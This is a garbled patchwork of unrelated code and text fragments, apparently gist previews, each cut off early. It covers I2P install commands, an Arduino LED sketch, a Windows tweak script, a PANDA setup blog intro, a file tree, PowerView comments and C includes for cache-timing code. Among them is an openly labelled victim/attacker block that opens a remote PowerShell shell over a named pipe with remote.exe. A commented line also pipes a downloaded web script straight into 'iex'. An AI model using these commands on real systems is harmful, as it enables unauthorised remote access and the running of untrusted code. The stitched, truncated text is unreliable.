sudo apt-get install python python-pip
sudo pip install awscli
aws configure
java -jar i2pinstall_*.jar
tar xzf wrapper-*.tar.gz
cp wrapper*/bin/wrapper /Applications/i2p/i2psvc
cp wrapper*/lib/wrapper.jar /Applications/i2p/lib
cp wrapper*/lib/libwrapper.so /Applications/i2p/lib
/Applications/i2p/i2prouter start
or Start I2P Router app<?php header("Content-Type: text/plain"); ?> | |
<?php header("Content-Disposition: inline"); ?> | |
#include <Adafruit_NeoPixel.h> | |
#ifdef __AVR__ | |
#include <avr/power.h> | |
#endif | |
//IMPORTANT: Update the pin and length to match your LED strip! | |
#define PIN 5 | |
#define LENGTH 150 |
### | |
### | |
### UPDATE: For Win 11, I recommend using this tool in place of this script: | |
### https://christitus.com/windows-tool/ | |
### https://github.com/ChrisTitusTech/winutil | |
### https://www.youtube.com/watch?v=6UQZ5oQg8XA | |
### iwr -useb https://christitus.com/win | iex | |
### | |
### |
Being someone who tries to play a lot with Windows memory, I really wanted to play with PANDA, but I was slightly scared because I'd never touched qemu
before - all my experience had been with VirtualBox and VMware.
My goal was to install PANDA into a (relatively) clean install of Debian 8 'Jessie', capture a recording and successfully run a PANDA plugin.
# Command to run on the victim | |
# This will establish a PowerShell listener over the "pwnme" named pipe | |
remote /S "powershell.exe" pwnme | |
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
remote /C [Hostname\IP] "pwnme" |
. | |
├── matree | |
├── swift | |
│ ├── 00503_0_254.242_2013mar02 | |
│ ├── 00546_0_ensbdasa-09aug2013 | |
│ ├── 00553_0_ensbdpix3-09aug2013 | |
│ ├── 00554_0_ensbdpix4-09aug2013 | |
│ ├── 00555_0_ensbdrtr1-2013aug09 | |
│ ├── 00557_0_ENSBDVPN1-02AUG2013 | |
│ ├── 00558_0_ENSBDVPN2-02AUG2013 |
#!/bin/bash | |
# macOS Sierra TFTP Server Creator | |
# Author Mertcan GÖKGÖZ - 07.05.2017 15:00 (GMT +3) | |
# | |
# Requirements | |
# - Macos Sierra 10.12.4 and later | |
# - 'homebrew' package manager | |
# - brew install dialog | |
# | |
# How to use |
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif |